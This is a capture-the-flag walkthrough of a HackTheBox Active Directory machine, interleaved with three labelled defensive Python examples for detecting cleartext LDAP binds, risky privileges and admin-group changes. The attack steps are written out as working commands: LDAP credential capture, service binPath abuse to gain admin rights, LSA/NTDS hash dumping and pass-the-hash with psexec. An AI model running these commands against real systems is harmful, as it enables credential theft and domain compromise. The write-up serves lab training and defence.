Return
AD box on HTB.

Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.148.204
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-09 20:04 +03
Nmap scan report for 10.129.148.204
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2025-09-09 20:04:39 +03 for 222s
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-09 17:23:55Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
We have multiple open ports that indicate an Active Directory domain controller, and we also have HTTP on port 80.
We can get the machine name and the domain using netexec as well:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb 10.129.148.204
SMB 10.129.148.204 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
So I will add the machine IP and the FQDN to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.148.204 PRINTER.return.local return.local PRINTER
Let's open up return.local in Firefox:

Every page other than Settings redirects us back to the same page.
Exploitation:
Let's see what we have on the settings page:

We can launch Burp Suite and click the Update button to see how the request is sent to the web server:

It's a POST request, and the other parameters were not specified.
Let's send this request to Repeater and try to play with the ip parameter:
I tried to see if it connects back to us by running a Python web server on port 80, but nothing happened. Going back to the settings.php page, we find that the server port is 389, which is LDAP.

We can start Responder to listen for any LDAP traffic:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ sudo responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.4]
Responder IPv6 [dead:beef:4::1002]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-2K33M3WIHK7]
Responder Domain Name [Y37M.LOCAL]
Responder DCE-RPC Port [47845]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events... 
[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client : 10.129.148.204
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg4******
[+] Exiting...
Here we got LDAP credentials.
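The credentials arrive because the printer's LDAP client performs a simple bind (RFC 4511), which carries the password as plain octets inside a BER-encoded BindRequest: an LDAPMessage starts with tag 0x30 (SEQUENCE) and the BindRequest with 0x60 ([APPLICATION 0]), which is why a raw listener prints the bytes 0*`% in front of the account name. The following Python is an added example, not part of this write-up or of Responder: a minimal BER decoder that parses a BindRequest and flags simple binds with a non-empty password, the check a defender would run on a network sensor or over a packet capture to find devices configured to authenticate to LDAP without TLS. The account name is taken from the capture above; the password and the SASL token are constructed placeholders, and the encoder exists only to build the sample bytes.

```python
"""Decode an LDAP BindRequest (RFC 4511, BER-encoded) and flag simple binds that
carry a reusable password in the clear.  Added example, not part of the write-up."""


def _read_tlv(buf: bytes, pos: int):
    """Read one BER tag-length-value element starting at `pos`.
    Returns (tag, value, position after the element).  Supports the short and
    long definite length forms, which is all LDAP uses."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = count of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


def parse_bind_request(packet: bytes) -> dict:
    """Parse LDAPMessage { messageID INTEGER, protocolOp BindRequest }.

    BindRequest ::= [APPLICATION 0] SEQUENCE {
        version INTEGER, name LDAPDN (OCTET STRING),
        authentication CHOICE { simple [0] OCTET STRING, sasl [3] SaslCredentials } }
    """
    tag, message, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, msg_id, pos = _read_tlv(message, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = _read_tlv(message, pos)
    if tag != 0x60:                          # [APPLICATION 0], constructed
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    _, version, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    info = {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", "replace"),
    }
    if auth_tag == 0x80:                     # [0] simple: password is plain octets on the wire
        info["auth"] = "simple"
        info["password"] = auth.decode("utf-8", "replace")
    elif auth_tag == 0xA3:                   # [3] sasl: SEQUENCE { mechanism, credentials OPTIONAL }
        _, mechanism, _ = _read_tlv(auth, 0)
        info["auth"] = "sasl"
        info["mechanism"] = mechanism.decode("utf-8", "replace")
    else:
        info["auth"] = f"unknown(0x{auth_tag:02x})"
    return info


def is_cleartext_bind(packet: bytes) -> bool:
    """True when the bind hands a reusable password to whoever holds the socket:
    a simple bind with a non-empty password (an empty one is an anonymous bind)."""
    info = parse_bind_request(packet)
    return info["auth"] == "simple" and bool(info.get("password"))


# --- constructed sample traffic (the encoder exists only to build the demo bytes) ---

def _tlv(tag: int, value: bytes) -> bytes:
    assert len(value) < 128, "short-form length is enough for these samples"
    return bytes([tag, len(value)]) + value


def build_simple_bind(name: str, password: str, message_id: int = 1) -> bytes:
    body = _tlv(0x02, b"\x03") + _tlv(0x04, name.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(0x60, body))


def build_sasl_bind(name: str, mechanism: str, message_id: int = 1) -> bytes:
    sasl = _tlv(0xA3, _tlv(0x04, mechanism.encode()) + _tlv(0x04, b"<token>"))
    body = _tlv(0x02, b"\x03") + _tlv(0x04, name.encode()) + sasl
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(0x60, body))


# Placeholder password with the same account name and password length as the capture,
# so the leading bytes come out as 0x30 0x2a ... 0x60 0x25 ("0*" and "`%" in a terminal).
SIMPLE_SAMPLE = build_simple_bind("return\\svc-printer", "PLACEHOLDER1")
SASL_SAMPLE = build_sasl_bind("return\\svc-printer", "GSS-SPNEGO")

if __name__ == "__main__":
    for pkt in (SIMPLE_SAMPLE, SASL_SAMPLE):
        print(parse_bind_request(pkt), "CLEARTEXT" if is_cleartext_bind(pkt) else "ok")
```

On the domain controller side the same condition is visible without a sensor: with LDAP interface diagnostics enabled, the Directory Service log records event 2889 for every client that performs a simple bind over a non-TLS connection, which is how a defender would inventory devices like this printer before moving them to LDAPS or requiring LDAP signing.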
We can capture them with netcat as well:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.16.4] from (UNKNOWN) [10.129.148.204] 54224
0*`%return\svc-printer
1edFg4******
Shell as svc-printer:
We can check whether svc-printer has any remote access:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec winrm printer.return.local -u svc-printer -p '1edFg4******'
WINRM 10.129.148.204 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.148.204 5985 PRINTER [+] return.local\svc-printer:1edFg4****** (Pwn3d!)
We can see that we have remote access using WinRM.
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ evil-winrm -i 10.129.148.204 -u svc-printer -p '1edFg4******'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Post-Exploitation:
Abuse Server Operators group:
Let's check our privileges:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We are members of the Print Operators group; combined with SeLoadDriverPrivilege, this can allow us to load a vulnerable driver and exploit it.
We can also see that we are a member of the Server Operators group, which grants us the SeBackupPrivilege and SeRestorePrivilege privileges.
This group also grants some server modification capabilities.
So we can, for example, change the binPath of a service that runs as a highly privileged user to add the svc-printer user to the local Administrators group:
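The combination just found on a service account (operator group memberships plus SeBackup, SeRestore and SeLoadDriver) is what a defender should be hunting for, so it is worth having a repeatable way to spot it. The following Python is an added example, not part of this write-up: it parses the text of whoami /all (tolerating the collapsed column spacing of copied terminal output), extracts group SIDs and privilege states, and reports the memberships and privileges that are escalation paths on a domain controller. The sample input is abridged from the output above; the risk descriptions in the two tables are my own summaries, not text from the page.

```python
"""Audit the text of `whoami /all` for group memberships and privileges that let an
ordinary service account escalate.  Added example, not part of the write-up."""
import re

# Well-known built-in group SIDs and why each one matters on a domain controller.
RISKY_GROUPS = {
    "S-1-5-32-544": "Administrators: full control of the host",
    "S-1-5-32-548": "Account Operators: can create and modify most domain accounts",
    "S-1-5-32-549": "Server Operators: can reconfigure services and log on locally to DCs",
    "S-1-5-32-550": "Print Operators: can load printer drivers and log on locally to DCs",
    "S-1-5-32-551": "Backup Operators: SeBackup/SeRestore over every file on the DC",
}
# Privileges that bypass object ACLs or reach into other security contexts.
RISKY_PRIVILEGES = {
    "SeBackupPrivilege": "read any file or registry hive regardless of its ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of its ACL",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeDebugPrivilege": "open and read any process, including LSASS",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\b.*\b(Enabled|Disabled)\s*$")
GROUP_TYPES = ("Well-known group", "Alias", "Label", "Group")


def parse_whoami_all(text: str):
    """Return (groups, privileges): groups maps SID -> group name, privileges maps
    privilege name -> 'Enabled' or 'Disabled'.  Tolerates the collapsed column
    spacing seen in copied terminal output."""
    groups, privileges = {}, {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) <= set("=- "):      # blank lines and ===== rulers
            continue
        if line.upper().endswith("INFORMATION"):     # USER / GROUP / PRIVILEGES / USER CLAIMS
            section = line.upper().split()[0]
            continue
        if section == "GROUP":
            m = SID_RE.search(line)
            if not m:
                continue                               # column header line
            before = line[:m.start()].strip()
            for kind in GROUP_TYPES:                   # strip the Type column to get the name
                if before.endswith(kind):
                    before = before[:-len(kind)].strip()
                    break
            groups[m.group()] = before
        elif section == "PRIVILEGES":
            m = PRIV_RE.match(line)
            if m:
                privileges[m.group(1)] = m.group(2)
    return groups, privileges


def audit(text: str):
    """List the escalation-relevant findings in a `whoami /all` dump."""
    groups, privileges = parse_whoami_all(text)
    findings = []
    for sid, why in RISKY_GROUPS.items():
        if sid in groups:
            findings.append(f"group {groups[sid]} ({sid}): {why}")
    for name, why in RISKY_PRIVILEGES.items():
        if privileges.get(name) == "Enabled":
            findings.append(f"privilege {name}: {why}")
    return findings


# Constructed sample, abridged from the output shown above.
SAMPLE = r"""
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103

GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288

PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Disabled

USER CLAIMS INFORMATION
-----------------------
User claims unknown.
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The fix on the defensive side is not to harden the privileges one by one but to remove the service account from the operator groups; on a domain controller those built-in groups are effectively administrative, and a print-server account has no business in any of them.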
*Evil-WinRM* PS C:\Users\svc-printer\Documents> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc
We can, for example, change the binPath of VMTools; in the Privileges column beside it we can see it says True as well:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="net localgroup administrators svc-printer /add"
[SC] ChangeServiceConfig SUCCESS
Before restarting the service, let's check the local Administrators group:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
Stop and start that service:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
It threw an error, but if we check the local Administrators group again:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.
We will see that we are now part of that group.
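The membership change just performed is exactly what a defender should alert on: a principal was added to BUILTIN\Administrators, and because the command ran from a service's binPath, the Service Control Manager executed it under the service's own account (LocalSystem for VMTools) rather than from an administrator's session. The following Python is an added example, not part of this write-up: it evaluates normalised Windows Security events 4732, 4728 and 4756 (member added to a local, global or universal security-enabled group) against a list of high-value groups and raises the severity when the actor is LocalSystem or when the principal added itself. The three sample records are constructed; the domain SID, the placeholder RIDs and the field layout (EventData names as exported from the event log) are assumptions.

```python
"""Flag Windows Security events that add a principal to a high-value group.
Event 4732 (member added to a security-enabled local group), 4728 (global group)
and 4756 (universal group) share the EventData field names used here.
Added example, not part of the write-up."""
from dataclasses import dataclass

# Built-in groups whose membership changes should always be reviewed.
WATCHED_BUILTIN = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}
# Domain groups are identified by the RID at the end of S-1-5-21-<domain>-<rid>.
WATCHED_DOMAIN_RIDS = {"512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins"}
MEMBER_ADDED_EVENTS = {4732, 4728, 4756}
LOCAL_SYSTEM_SID = "S-1-5-18"


def watched_group_name(sid: str):
    """Name of the watched group for `sid`, or None if the group is not high-value."""
    if sid in WATCHED_BUILTIN:
        return WATCHED_BUILTIN[sid]
    if sid.startswith("S-1-5-21-"):
        return WATCHED_DOMAIN_RIDS.get(sid.rsplit("-", 1)[1])
    return None


@dataclass
class Finding:
    severity: str
    group: str
    member_sid: str
    actor: str
    reason: str


def evaluate(event: dict):
    """Return a Finding for an addition to a watched group, else None."""
    if event.get("EventID") not in MEMBER_ADDED_EVENTS:
        return None
    group = watched_group_name(event["TargetSid"])
    if group is None:
        return None
    actor = f'{event["SubjectDomainName"]}\\{event["SubjectUserName"]}'
    severity, reason = "medium", f"member added to {group}; confirm a change record exists"
    if event["SubjectUserSid"] == LOCAL_SYSTEM_SID:
        # A service or scheduled task changed group membership: no admin session is behind it.
        severity, reason = "high", f"member added to {group} by LocalSystem (service/task context)"
    elif event["SubjectUserSid"] == event["MemberSid"]:
        severity, reason = "high", f"principal added itself to {group}"
    return Finding(severity, group, event["MemberSid"], actor, reason)


def scan(events):
    """Evaluate a batch of normalised events and return the findings in order."""
    return [f for f in map(evaluate, events) if f is not None]


# Constructed sample records: the domain SID, RIDs and names are placeholders.
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_EVENTS = [
    {   # routine: an admin adds a helpdesk user to Remote Desktop Users (not watched)
        "EventID": 4732, "SubjectUserSid": f"{DOMAIN}-500", "SubjectUserName": "Administrator",
        "SubjectDomainName": "RETURN", "MemberSid": f"{DOMAIN}-1201", "MemberName": "-",
        "TargetSid": "S-1-5-32-555", "TargetUserName": "Remote Desktop Users", "TargetDomainName": "Builtin",
    },
    {   # a service running as LocalSystem adds an account to Administrators
        "EventID": 4732, "SubjectUserSid": LOCAL_SYSTEM_SID, "SubjectUserName": "PRINTER$",
        "SubjectDomainName": "RETURN", "MemberSid": f"{DOMAIN}-1103", "MemberName": "-",
        "TargetSid": "S-1-5-32-544", "TargetUserName": "Administrators", "TargetDomainName": "Builtin",
    },
    {   # an admin adds the same account to Domain Admins
        "EventID": 4728, "SubjectUserSid": f"{DOMAIN}-500", "SubjectUserName": "Administrator",
        "SubjectDomainName": "RETURN", "MemberSid": f"{DOMAIN}-1103",
        "MemberName": "CN=svc-printer,CN=Users,DC=return,DC=local",
        "TargetSid": f"{DOMAIN}-512", "TargetUserName": "Domain Admins", "TargetDomainName": "RETURN",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A service start that fails with error 1053 right before the membership change (the SCM logs that failure in the System log) is the natural second signal to correlate with, since a binPath that points at a command rather than a service binary never reports back to the Service Control Manager.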
Dump the secrets:
What we can do now is dump secrets, for example SAM, LSA, etc.
I will use netexec to help us with this:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb printer.return.local -u svc-printer -p '1edFg4******' --lsa
SMB 10.129.148.204 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 PRINTER [+] return.local\svc-printer:1edFg4****** (Pwn3d!)
SMB 10.129.148.204 445 PRINTER [+] Dumping LSA secrets
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:aes256-cts-hmac-sha1-96:701e48cb390a55cb1fcb814b9b4f59ad135f2904e8e0e78d8391f77cd13d****
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:aes128-cts-hmac-sha1-96:5fc0305293df0099525728a3a0a0f9ef
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:des-cbc-md5:1ca204918a2a6226
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:plain_password_hex:5ddbb4747a7f0339488ec50284f01f7f3790e4371bf48777832a85073d7968454967fb7539ba4012404fe64f084614e76297163be08a9f28ae54e76351bc0de8acf09ee1a0100dde87afd9831ff9613e3131430e9b05f2b252b8580afb0a7fb6af1929377c62c5bba527f0832c916fc330ba638bb572cbe9da532c04882f55448b1bfef43c143fd3631063cd32378374d90f97e96a8a62ee4b5e2666fc042d5c36e06e290655a62d3553e0b278de7c8e02560409942352345e15f825497a8b9c245b98ba3acc7a67848a18189e0f835c0addd1837dee0f0124eec557472dfc6fd11d6af67cb20bf61916c8941bbac32e
SMB 10.129.148.204 445 PRINTER RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:ba0cf7a0c94a04c0****************:::
SMB 10.129.148.204 445 PRINTER dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
SMB 10.129.148.204 445 PRINTER [+] Dumped 6 LSA secrets to /home/kali/.nxc/logs/lsa/PRINTER_10.129.148.204_2025-09-09_222117.secrets and /home/kali/.nxc/logs/lsa/PRINTER_10.129.148.204_2025-09-09_222117.cached
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ netexec smb printer.return.local -u printer$ -H ba0cf7a0c94a04c0**************** --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 10.129.148.204 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.148.204 445 PRINTER [+] return.local\printer$:ba0cf7a0c94a04c0****************
SMB 10.129.148.204 445 PRINTER [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.129.148.204 445 PRINTER [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.148.204 445 PRINTER Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1****************:::
SMB 10.129.148.204 445 PRINTER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931****************:::
SMB 10.129.148.204 445 PRINTER krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add3****************:::
SMB 10.129.148.204 445 PRINTER return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246****************:::
SMB 10.129.148.204 445 PRINTER PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:ba0cf7a0c94a04c0****************:::
SMB 10.129.148.204 445 PRINTER [+] Dumped 5 NTDS hashes to /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds of which 4 were added to the database
SMB 10.129.148.204 445 PRINTER [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.148.204 445 PRINTER [*] cat /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.148.204 445 PRINTER [*] grep -iv disabled /home/kali/.nxc/logs/ntds/PRINTER_10.129.148.204_2025-09-09_222513.ntds | cut -d ':' -f1
We can now use that Administrator NTLM hash to authenticate to the target machine as that user:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Return]
└─$ impacket-psexec return.local/administrator@10.129.148.204 -hashes :32db622ed9c00dd1****************
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.148.204.....
[*] Found writable share ADMIN$
[*] Uploading file rOqKosif.exe
[*] Opening SVCManager on 10.129.148.204.....
[*] Creating service yhCC on 10.129.148.204.....
[*] Starting service yhCC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
printer
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::fc21:a949:71d3:32b5
Link-local IPv6 Address . . . . . : fe80::fc21:a949:71d3:32b5%10
IPv4 Address. . . . . . . . . . . : 10.129.148.204
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%10
10.129.0.1
We can also read the flags:
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
84ebbe6b63a6319a****************
C:\Windows\system32> type C:\Users\svc-printer\Desktop\user.txt
19119e2dab6f9a64****************